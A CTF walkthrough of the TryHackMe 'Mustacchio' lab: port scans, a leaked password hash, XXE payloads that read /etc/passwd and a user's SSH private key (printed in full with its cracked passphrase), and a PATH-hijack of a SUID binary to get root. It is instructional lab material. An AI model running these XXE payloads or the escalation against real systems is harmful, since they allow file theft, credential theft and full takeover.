πΊMustacchio
License
The following post by anthonyjsaab is licensed under CC BY 4.0
0 - Introduction
Link to room: https://tryhackme.com/r/room/mustacchio
Machine version: Mustacchio V2
This writeup walks you through a room on TryHackMe created by zyeinn
1 - Port Scans
1a - Discovery
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -sS -T4 -p- -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 18:56 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.100s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-http
Nmap done: 1 IP address (1 host up) scanned in 111.50 seconds1b - Versioning and OS fingerprinting
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -sC -sV -O -T4 -p22,80,8765 -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 18:58 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
| http-robots.txt: 1 disallowed entry
|_/
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 5.X|3.X (89%), Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:5.4 cpe:/o:linux:linux_kernel:3 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Linux 5.4 (89%), Linux 3.10 - 3.13 (88%), Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds1c - Vulners
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80,8765 -Pn mustacchio.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 19:00 EEST
Nmap scan report for mustacchio.thm (10.10.75.137)
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
| PRION:CVE-2016-8858 7.8 https://vulners.com/prion/PRION:CVE-2016-8858
| PRION:CVE-2016-6515 7.8 https://vulners.com/prion/PRION:CVE-2016-6515
| PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT*
| EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT*
| EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT*
| CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858
| CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515
| 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT*
| SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT*
| PRION:CVE-2023-35784 7.5 https://vulners.com/prion/PRION:CVE-2023-35784
| PRION:CVE-2016-10009 7.5 https://vulners.com/prion/PRION:CVE-2016-10009
| PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT*
| CVE-2023-35784 7.5 https://vulners.com/cve/CVE-2023-35784
| CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009
| 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT*
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
| PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT*
| PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| F41EE867-4E63-5259-9DF0-745881884D04 7.5 https://vulners.com/githubexploit/F41EE867-4E63-5259-9DF0-745881884D04 *EXPLOIT*
| EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| C879EE66-6B75-5EC8-AA68-08693C6CCAD1 7.5 https://vulners.com/githubexploit/C879EE66-6B75-5EC8-AA68-08693C6CCAD1 *EXPLOIT*
| B02819DB-1481-56C4-BD09-6B4574297109 7.5 https://vulners.com/githubexploit/B02819DB-1481-56C4-BD09-6B4574297109 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 831E1114-13D1-54EF-BDE4-F655114CDC29 7.5 https://vulners.com/githubexploit/831E1114-13D1-54EF-BDE4-F655114CDC29 *EXPLOIT*
| 78787F63-0356-51EC-B32A-B9BD114431C3 7.5 https://vulners.com/githubexploit/78787F63-0356-51EC-B32A-B9BD114431C3 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 64D31BF1-F977-51EC-AB1C-6693CA6B58F3 7.5 https://vulners.com/githubexploit/64D31BF1-F977-51EC-AB1C-6693CA6B58F3 *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 495E99E5-C1B0-52C1-9218-384D04161BE4 7.5 https://vulners.com/githubexploit/495E99E5-C1B0-52C1-9218-384D04161BE4 *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 0.0 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
|_ 45D138AD-BEC6-552A-91EA-8816914CA7F4 0.0 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds2 - Port 80
2a - Dirbusting
βββ(kaliγΏkali)-[~]
ββ$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://mustacchio.thm
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://mustacchio.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/custom (Status: 301) [Size: 317] [--> http://mustacchio.thm/custom/]
/fonts (Status: 301) [Size: 316] [--> http://mustacchio.thm/fonts/]
/images (Status: 301) [Size: 317] [--> http://mustacchio.thm/images/]
/index.html (Status: 200) [Size: 1752]
/robots.txt (Status: 200) [Size: 28]
/server-status (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================After going though the files and folders shown above, we can find a file named users.bak here:
2b - Opening users.bak
The file extension .bak is a generic suffix used to designated a backup file. Thus, it does not tell us what kind of file we have and how to open it. The first tool to use is exiftool:
βββ(kaliγΏkali)-[~]
ββ$ exiftool Downloads/users.bak
ExifTool Version Number : 12.76
File Name : users.bak
Directory : Downloads
File Size : 8.2 kB
File Modification Date/Time : 2024:05:21 19:06:57+03:00
File Access Date/Time : 2024:05:21 19:07:49+03:00
File Inode Change Date/Time : 2024:05:21 19:06:57+03:00
File Permissions : -rw-r--r--
Error : Unknown file typeIt did not help us. Next, we try to opening it using Mousepad:
βββ(kaliγΏkali)-[~]
ββ$ sqlite3 Downloads/users.bak
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4bAfter some searching for a login portal, we find that the port 8765 has one.
3 - Port 8765
3a - Logging in
Trying to login using the recovered credentials does not work. I suspect that the password was not stored in plaintext but as a hash. Thus, we need to crack it and try again:
3b - Comment input
3bi - Probing
Now this is clear. The input text field requires those 3 child elements: name, author and comment. Let us try:
I couldn't figure out the correct tag for the comment section, but I guess we won't really need it since two others are working.
Now, I wasn't sure what I could do with this field. I googled XML attacks, and found this interesting webpage: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
3c - XXE powered exfiltration
I crafted this payload:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE name [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
<author>insecureman1337</author>
</root>and got this:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false joe:x:1002:1002::/home/joe:/bin/bash barry:x:1003:1003::/home/barry:/bin/bashWe now know the target machine has two human user accounts: joe and barry
Let us try to retrieve their respective SSH private keys.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE name [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<root>
<name>&xxe;</name>
<author>insecureman1337</author>
</root>It worked for barry only and not joe.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E
jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN
bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU
MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65
l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D
Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E
NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ
ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie
TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC
rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX
bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk
4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8
7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+
T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki
ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7
LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs
pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg
laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o
vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK
DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF
6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF
ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs
7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of
1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ
+Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----4 - SSH
4a - SSH key cracking
The above key is encrypted. We need to crack it.
βββ(kaliγΏkali)-[~]
ββ$ john --wordlist=~/Documents/rockyou.txt barry.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
βββ(kaliγΏkali)-[~]
ββ$ john --wordlist=~/Documents/rockyou.txt barry.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
βββ(kaliγΏkali)-[~]
ββ$ john --show barry.hash
barry_id_rsa:urieljames
1 password hash cracked, 0 left4b - Foothold!
βββ(kaliγΏkali)-[~]
ββ$ ssh [email protected] -i barry_id_rsa
Enter passphrase for key 'barry_id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
34 packages can be updated.
16 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
barry@mustacchio:~$ ls -la
total 20
drwxr-xr-x 4 barry barry 4096 May 22 06:45 .
drwxr-xr-x 4 root root 4096 Jun 12 2021 ..
drwx------ 2 barry barry 4096 May 22 06:45 .cache
drwxr-xr-x 2 barry barry 4096 Jun 12 2021 .ssh
-rw-r--r-- 1 barry barry 33 Jun 12 2021 user.txt5 - PrivEsc
5a - Looking around
The first move I always do when establishing foothold is go to the home directories of other users. Looking into joe's home dir:
barry@mustacchio:~$ cd /home/joe
barry@mustacchio:/home/joe$ ls -la
total 28
drwxr-xr-x 2 joe joe 4096 Jun 12 2021 .
drwxr-xr-x 4 root root 4096 Jun 12 2021 ..
-rwsr-xr-x 1 root root 16832 Jun 12 2021 live_log
barry@mustacchio:/home/joe$ file live_log
live_log: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6c03a68094c63347aeb02281a45518964ad12abe, for GNU/Linux 3.2.0, not strippedThis is important, we have a root-owned executable with the SUID bit set! Let us look into this.
5b - Weaponizing and Escalation
We exfiltrate the ELF executable to our Kali machine for further analysis:
βββ(kaliγΏkali)-[~]
ββ$ scp -i barry_id_rsa [email protected]:/home/joe/live_log .
live_log 100% 16KB 40.4KB/s 00:00
βββ(kaliγΏkali)-[~]
ββ$ strings live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
--snip-- Nice! It seems the executable is executing tail. Let us check if this is right:
barry@mustacchio:/home/joe$ ./live_log
10.11.85.12 - - [22/May/2024:09:56:56 +0000] "GET / HTTP/1.1" 200 728 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:56:57 +0000] "GET / HTTP/1.1" 200 728 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:57:00 +0000] "POST /home.php HTTP/1.1" 302 3860 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
10.11.85.12 - - [22/May/2024:09:57:00 +0000] "GET /index.php HTTP/1.1" 200 728 "http://mustacchio.thm:8765/home.php" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"It does seem to execute tail on a log file. Since a relative path was used to reference tail, we can change PATH and make live_log launch a program of our choice with root privileges.
barry@mustacchio:~$ nano shell.py
barry@mustacchio:~$ cat shell.py
#!/usr/bin/python3
import pty
pty.spawn("/bin/bash")
barry@mustacchio:~$ printenv | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ export PATH=/home/barry:$PATH
barry@mustacchio:~$ printenv | grep PATH
PATH=/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ mv shell.py tail
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$ /home/joe/live_log
root@mustacchio:~# id
uid=0(root) gid=0(root) groups=0(root),1003(barry)
root@mustacchio:~# Last updated
Was this helpful?